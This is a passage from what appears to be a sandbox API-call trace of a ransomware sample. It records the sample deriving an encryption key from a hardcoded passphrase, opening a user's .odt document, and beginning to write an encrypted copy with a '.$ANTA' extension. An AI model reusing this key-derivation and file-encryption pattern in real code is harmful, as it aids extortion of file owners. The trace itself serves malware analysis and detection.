dwFlags=0x0, lpMem=0x43cfc48 | out: hHeap=0x1780000) returned 1 [0077.523] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2160 | out: hHeap=0x1780000) returned 1 [0077.523] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfa68 | out: hHeap=0x1780000) returned 1 [0077.523] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca1d8 | out: hHeap=0x1780000) returned 1 [0077.523] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfab8 | out: hHeap=0x1780000) returned 1 [0077.523] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2490 | out: hHeap=0x1780000) returned 1 [0077.523] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfa90 | out: hHeap=0x1780000) returned 1 [0077.523] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6e8 | out: hHeap=0x1780000) returned 1 [0077.523] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4369d70 | out: hHeap=0x1780000) returned 1 [0077.524] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25c0 | out: hHeap=0x1780000) returned 1 [0077.524] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca748 | out: hHeap=0x1780000) returned 1 [0077.524] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4a8 | out: hHeap=0x1780000) returned 1 [0077.524] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca760 | out: hHeap=0x1780000) returned 1 [0077.524] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca658 | out: hHeap=0x1780000) returned 1 [0077.524] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4d8 | out: hHeap=0x1780000) returned 1 [0077.524] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca598 | out: hHeap=0x1780000) returned 1 [0077.524] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca538 | out: hHeap=0x1780000) returned 1 [0077.524] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca670 | out: hHeap=0x1780000) returned 1 [0077.524] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfce8 | out: hHeap=0x1780000) returned 1 [0077.524] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e93c8 | out: hHeap=0x1780000) returned 1 [0077.524] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2530 | out: hHeap=0x1780000) returned 1 [0077.524] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca238 | out: hHeap=0x1780000) returned 1 [0077.524] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca400 | out: hHeap=0x1780000) returned 1 [0077.524] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2520 | out: hHeap=0x1780000) returned 1 [0077.524] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfb58 | out: hHeap=0x1780000) returned 1 [0077.524] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9ba8 | out: hHeap=0x1780000) returned 1 [0077.524] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e21e0 | out: hHeap=0x1780000) returned 1 [0077.524] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2220 | out: hHeap=0x1780000) returned 1 [0077.524] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0077.525] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0077.525] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x43c9bf0, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CloseHandle", lpUsedDefaultChar=0x0) returned 12 [0077.525] CloseHandle (hObject=0x298) returned 1 [0077.525] FreeLibrary (hLibModule=0x772d0000) returned 1 [0077.525] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTFILE", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTFILE") returned 0x12 [0077.525] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Documents\\O8- 8r.odt", lpFindFileData=0x144ed28 | out: lpFindFileData=0x144ed28*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x83fb2180, ftCreationTime.dwHighDateTime=0x1d5e306, ftLastAccessTime.dwLowDateTime=0x7511100, ftLastAccessTime.dwHighDateTime=0x1d5e6b5, ftLastWriteTime.dwLowDateTime=0x7511100, ftLastWriteTime.dwHighDateTime=0x1d5e6b5, nFileSizeHigh=0x0, nFileSizeLow=0x10245, dwReserved0=0x43c34c0, dwReserved1=0x8, cFileName="O8- 8r.odt", cAlternateFileName="O8-8R~1.ODT")) returned 0x41ac140 [0077.525] FindClose (in: hFindFile=0x41ac140 | out: hFindFile=0x41ac140) returned 1 [0077.525] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0077.525] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0077.526] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLESET", cchLength=0x14 | out: lpsz="__CRYPT_DLLHANDLESET") returned 0x14 [0077.526] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0077.526] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0077.526] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0077.526] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x1797128, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContext", lpUsedDefaultChar=0x0) returned 20 [0077.526] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0077.526] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x1797008, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContextA", lpUsedDefaultChar=0x0) returned 21 [0077.526] CryptAcquireContextA (in: phProv=0x144ea08, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x144ea08*=0x41a5250) returned 1 [0077.527] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXTSET", cchLength=0x12 | out: lpsz="__CRYPT_CONTEXTSET") returned 0x12 [0077.527] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0077.527] CharUpperBuffW (in: lpsz="_CRYPT_DERIVEKEY", cchLength=0x10 | out: lpsz="_CRYPT_DERIVEKEY") returned 0x10 [0077.527] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0077.527] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0077.527] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0077.560] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0077.560] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0077.561] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0077.561] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0077.561] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x43ca5e0, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptCreateHash", lpUsedDefaultChar=0x0) returned 16 [0077.561] CryptCreateHash (in: hProv=0x41a5250, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x144e778 | out: phHash=0x144e778) returned 1 [0077.561] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="mimniasnfiwentientienternyeirynery", cchWideChar=35, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 35 [0077.561] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="mimniasnfiwentientienternyeirynery", cchWideChar=35, lpMultiByteStr=0x17e2b48, cbMultiByte=35, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="mimniasnfiwentientienternyeirynery", lpUsedDefaultChar=0x0) returned 35 [0077.561] CharLowerBuffW (in: lpsz="byte[34]", cchLength=0x8 | out: lpsz="byte[34]") returned 0x8 [0077.561] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="mimniasnfiwentientienternyeirynery", cchWideChar=35, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 35 [0077.561] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="mimniasnfiwentientienternyeirynery", cchWideChar=35, lpMultiByteStr=0x17e2c08, cbMultiByte=35, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="mimniasnfiwentientienternyeirynery", lpUsedDefaultChar=0x0) returned 35 [0077.561] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0077.561] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0077.561] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0077.561] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x43caa78, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptHashData", lpUsedDefaultChar=0x0) returned 14 [0077.561] CryptHashData (hHash=0x41ac500, pbData=0x17e2bd8, dwDataLen=0x22, dwFlags=0x1) returned 1 [0077.561] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0077.562] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0077.562] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0077.562] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0077.562] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x43ca508, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDeriveKey", lpUsedDefaultChar=0x0) returned 15 [0077.562] CryptDeriveKey (in: hProv=0x41a5250, Algid=0x6610, hBaseData=0x41ac500, dwFlags=0x1, phKey=0x144e778 | out: phKey=0x144e778*=0x41ac540) returned 1 [0077.562] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0077.562] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0077.562] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0077.562] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x1796f48, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyHash", lpUsedDefaultChar=0x0) returned 17 [0077.562] CryptDestroyHash (hHash=0x41ac500) returned 1 [0077.562] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2530 [0077.563] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x214) returned 0x43eafd0 [0077.563] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25d0 [0077.563] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca988 [0077.563] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca970 [0077.563] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac28 [0077.563] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2600 [0077.563] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca970 [0077.563] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad60 [0077.563] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caaa8 [0077.563] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2600 [0077.563] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26f0 [0077.563] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfe50 [0077.563] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca928 [0077.563] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2560 [0077.563] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca940 [0077.563] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2720 [0077.563] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9b8 [0077.563] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2620 [0077.563] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e24b0 [0077.563] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20a) returned 0x43ea730 [0077.563] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2520 [0077.563] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac2c0 [0077.564] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0077.564] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac2c0 | out: hHeap=0x1780000) returned 1 [0077.564] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0077.564] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac440 | out: hHeap=0x1780000) returned 1 [0077.564] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0077.564] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e23a0 [0077.564] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfa68 [0077.564] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9d28 [0077.564] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2420 [0077.564] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca418 [0077.564] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2420 | out: hHeap=0x1780000) returned 1 [0077.564] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca358 [0077.564] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e24b0 [0077.564] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24b0 | out: hHeap=0x1780000) returned 1 [0077.564] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac640 [0077.564] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10000) returned 0x43eb3a8 [0077.564] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca388 [0077.564] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2420 [0077.564] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Documents\\O8- 8r.odt" (normalized: "c:\\users\\fd1hvy\\documents\\o8- 8r.odt"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x298 [0077.565] SetFilePointerEx (in: hFile=0x298, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0077.565] SetFilePointerEx (in: hFile=0x298, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x144eeb0 | out: lpNewFilePointer=0x0) returned 1 [0077.565] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf950 [0077.565] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca1c0 [0077.565] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e24b0 [0077.565] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca418 | out: hHeap=0x1780000) returned 1 [0077.565] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9d28 | out: hHeap=0x1780000) returned 1 [0077.565] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca358 | out: hHeap=0x1780000) returned 1 [0077.565] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfa68 | out: hHeap=0x1780000) returned 1 [0077.565] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e23a0 | out: hHeap=0x1780000) returned 1 [0077.565] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0077.565] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e23a0 [0077.565] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e23d0 [0077.565] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2520 [0077.565] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1797048 [0077.565] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2520 | out: hHeap=0x1780000) returned 1 [0077.565] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1797048 | out: hHeap=0x1780000) returned 1 [0077.565] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e23d0 | out: hHeap=0x1780000) returned 1 [0077.565] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e23a0 | out: hHeap=0x1780000) returned 1 [0077.565] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac2c0 [0077.565] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0077.565] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac2c0 | out: hHeap=0x1780000) returned 1 [0077.565] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0077.565] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e23d0 [0077.566] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfc48 [0077.566] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca358 [0077.566] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2520 [0077.566] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca418 [0077.566] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2520 | out: hHeap=0x1780000) returned 1 [0077.566] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca370 [0077.566] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2520 [0077.566] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e23a0 [0077.566] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796e48 [0077.566] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796e48 | out: hHeap=0x1780000) returned 1 [0077.566] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e23a0 | out: hHeap=0x1780000) returned 1 [0077.566] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2520 | out: hHeap=0x1780000) returned 1 [0077.566] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca400 [0077.566] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2520 [0077.566] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca238 [0077.566] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e23a0 [0077.566] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca448 [0077.566] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26e0 [0077.566] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca250 [0077.566] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26d0 [0077.566] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca280 [0077.566] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2660 [0077.566] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca460 [0077.566] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25f0 [0077.566] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca280 | out: hHeap=0x1780000) returned 1 [0077.567] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391a10 [0077.567] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2560 [0077.567] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x60) returned 0x4359ba0 [0077.567] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca250 | out: hHeap=0x1780000) returned 1 [0077.567] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8d98 [0077.567] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca238 | out: hHeap=0x1780000) returned 1 [0077.567] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a90f8 [0077.567] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4359ba0 | out: hHeap=0x1780000) returned 1 [0077.567] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2560 | out: hHeap=0x1780000) returned 1 [0077.567] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca460 | out: hHeap=0x1780000) returned 1 [0077.567] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25f0 | out: hHeap=0x1780000) returned 1 [0077.567] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391a10 | out: hHeap=0x1780000) returned 1 [0077.567] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2660 | out: hHeap=0x1780000) returned 1 [0077.567] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8d98 | out: hHeap=0x1780000) returned 1 [0077.567] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26d0 | out: hHeap=0x1780000) returned 1 [0077.567] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca448 | out: hHeap=0x1780000) returned 1 [0077.567] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26e0 | out: hHeap=0x1780000) returned 1 [0077.567] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25b0 [0077.567] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a9218 [0077.567] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Documents\\" (normalized: "c:\\users\\fd1hvy\\documents")) returned 0x11 [0077.567] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a9218 | out: hHeap=0x1780000) returned 1 [0077.567] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25b0 | out: hHeap=0x1780000) returned 1 [0077.567] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a90f8 | out: hHeap=0x1780000) returned 1 [0077.567] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e23a0 | out: hHeap=0x1780000) returned 1 [0077.568] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca400 | out: hHeap=0x1780000) returned 1 [0077.568] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2520 | out: hHeap=0x1780000) returned 1 [0077.568] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac440 [0077.568] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10000) returned 0x43fb3b0 [0077.568] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca1a8 [0077.568] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2520 [0077.568] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Documents\\O8- 8r.odt.$ANTA" (normalized: 